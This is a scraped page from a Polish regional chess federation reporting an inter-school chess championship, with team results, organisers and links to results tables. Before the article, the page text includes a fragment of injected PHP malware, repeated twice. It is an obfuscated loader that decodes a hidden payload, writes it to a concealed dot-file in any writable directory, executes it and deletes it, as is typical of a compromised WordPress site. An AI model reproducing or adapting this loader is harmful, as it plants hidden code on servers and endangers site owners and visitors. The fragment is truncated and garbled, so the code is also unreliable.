100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> 100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> Wyniki Mistrzostw Międzyszkolnych | Łódzki Związek Szachowy Skip to main content

Wyniki Mistrzostw Międzyszkolnych

1 grudnia w Mundurowym Liceum Ogólnokształcącym odbyły się zawody mające na cely wyłonić najlepsze szkoły na poziomie szkół podstawowych, gimanzjów i szkół ponadgimnazjalnych. Na starcie zawodów stanęło ponad 200 zawodników reprezentujących 46 drużyn. Impreza była organizacyjnym sukcesem ze względu na dużą liczbę uczestników z czego dla wielu z nich był to pierwszy turniej w życiu. Dwie najlepsze drużyny z każdej grupy awansowały od kolejnej fazy rozgrywek na szczeblu wojewódzkim. Wśród szkół podstawowych najlepsza okazała się drużyna z SP 172 z kompletem zwycięstw, a drugie miejsce zajęła druga drużyna z tej szkoły, podium uzupełniła Szkoła Podstawa ZNP. Pełny serwis turniej dostępny tutaj http://chessarbiter.com/turnieje/2017/tdr_7434/results.html?l=pl&tb=202_   . Wsród gimnazjów triumfowało Gimnazjum SŁO przed Gimnazjum nr 22 i Gimnazjum nr 15. W stawce szkół ponadgimnazjalnych najlepsze okazało się Technikum Geodezyjne-Techniczne , przed XXVI Liceum Ogólnokształcącym i XIII Liceum Ogólnokształcącym http://http://chessarbiter.com/turnieje/2017/tdr_7435/results.html?l=pl&tb=202_. Nad przebiegiem zawodów czuwali główny organizator Sylwester Bednarek prezes Łódzkiego Związku Szachowego, oraz sędziowie Piotr Straupisz i Krzysztof Żurkiewicz. W przyszłym roku liczymy na jeszcze wyższą frekwencję.

Dodaj komentarz